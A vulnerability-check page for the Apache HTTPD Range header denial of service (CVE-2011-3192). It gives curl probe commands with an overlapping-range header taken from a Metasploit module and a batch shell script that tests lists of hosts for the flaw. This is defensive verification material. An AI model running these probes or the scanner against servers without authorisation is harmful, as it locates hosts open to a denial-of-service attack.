Apache Killer: Apache HTTPD Range Header Denial of Service Vulnerability

CVE-2011-3192

A denial-of-service vulnerability has been found in the way multiple overlapping byte ranges are handled by the Apache HTTPD server prior to version 2.2.20: a single request that specifies a large number of overlapping ranges makes the server allocate memory and CPU time for every range, exhausting the host. Original disclosure:

 http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild. Active use of this tool has been observed.

In addition to the 'Range' header, the 'Request-Range' header (a legacy alias that Apache still honours) is equally affected, so both headers must be tested and any mitigation must cover both. The Apache advisory was later updated with vendor fixes and improved mitigation regexes (faster, and matching a different, newer attack pattern).

Affected Systems

All versions of Apache HTTPD prior to version 2.2.20 (the Apache advisory listed the 1.3.x and 2.0.x branches as affected as well).

Manual Verification Tests

  • Command to be used

curl http://<IP>/ -H "Host: <hostname>" -H "Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10" -w "%{http_code}" -o /dev/null -s

OR

curl http://<IP>/ -H "Host: <hostname>" -H "Request-Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10" -w "%{http_code}" -o /dev/null -s

  • Result Expected

Test Fail (machine vulnerable): HTTP 206 Partial Content. The server honoured the overlapping, out-of-order ranges, which is exactly the behaviour the attack tool abuses.

Test Pass (machine not vulnerable): any error or response other than 206 (typically 200 OK, meaning the server ignored the Range header and returned the whole resource).

Note: the leading range 5-0 (last-byte-pos below first-byte-pos) is syntactically invalid under RFC 2616 section 14.35.1, so a server that follows the specification ignores the whole header and answers 200; a server that skips the bad range and still serves the remaining ten one-byte ranges answers 206. Run the probe against a static resource that exists and is longer than 10 bytes: a 404, or a connection failure (curl prints 000), says nothing about the Range handling and must not be recorded as a pass. Payload is a direct copy from the MSF module.
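
The following script is an added example, not part of the original page and not code from the Apache project or the Metasploit module: it wraps the curl probe above so that a list of hosts can be checked in one run with both the Range and the Request-Range header, and applies the pass/fail criteria above, with the one refinement that a missing HTTP response (curl status 000) is reported as unknown rather than as a pass. Targets are read from stdin as "ip hostname [path]"; the default path, the 10-second timeout, the script name check.sh and the 192.0.2.10 sample target are assumptions.

```shell
#!/bin/sh
# Added example (not from the original page, Apache or Metasploit): batch
# wrapper around the CVE-2011-3192 curl probe. Reads "ip hostname [path]"
# lines from stdin and probes each with both affected header names.

# Build the probe value: the invalid leading range 5-0 followed by N one-byte,
# out-of-order ranges. With N=10 this is exactly the header used in the
# manual test above.
build_ranges() {
    n=${1:-10}
    out="bytes=5-0"
    i=1
    while [ "$i" -le "$n" ]; do
        out="$out,$i-$i"
        i=$((i + 1))
    done
    printf '%s' "$out"
}

# Apply the page's criteria to an HTTP status code. curl prints 000 when no
# HTTP response was received at all; that proves nothing about the server's
# Range handling, so it is reported separately instead of as a pass.
classify() {
    case "$1" in
        206)    echo "VULNERABLE" ;;
        000|"") echo "UNKNOWN (no HTTP response)" ;;
        *)      echo "NOT VULNERABLE" ;;
    esac
}

# Send one probe and print only the status code.
# $1 = IP, $2 = value for the Host header, $3 = header name, $4 = path.
probe() {
    curl -s -o /dev/null -w '%{http_code}' --max-time 10 \
        -H "Host: $2" -H "$3: $(build_ranges 10)" "http://$1$4"
}

# Probe every target on stdin with both header names and print a verdict line.
scan() {
    while read -r ip host path; do
        [ -n "$ip" ] || continue
        path=${path:-/}            # assumed default: the site root
        for hdr in Range Request-Range; do
            code=$(probe "$ip" "$host" "$hdr" "$path")
            printf '%-15s %-30s %-13s %s -> %s\n' \
                "$ip" "$host" "$hdr" "$code" "$(classify "$code")"
        done
    done
}

# Usage (constructed sample target, 192.0.2.10 is a documentation address):
#   printf '192.0.2.10 www.example.test /index.html\n' | sh check.sh scan
if [ "$#" -gt 0 ] && [ "$1" = "scan" ]; then
    scan
fi
```

Point the path at a static file that is longer than 10 bytes, as noted above; a 404 or a timeout is reported but is not evidence that the server is patched.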

Vulnerability Identifications

CVE : CVE-2011-3192
Nessus plugin ID : 55976
BugTraq ID : 49303
OSVDB :

Reference Links

  • https://httpd.apache.org/security/CVE-2011-3192.txt
  • https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2011-3192
  • https://www.rapid7.com/db/modules/auxiliary/dos/http/apache_range_dos
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/http/apache_range_dos.rb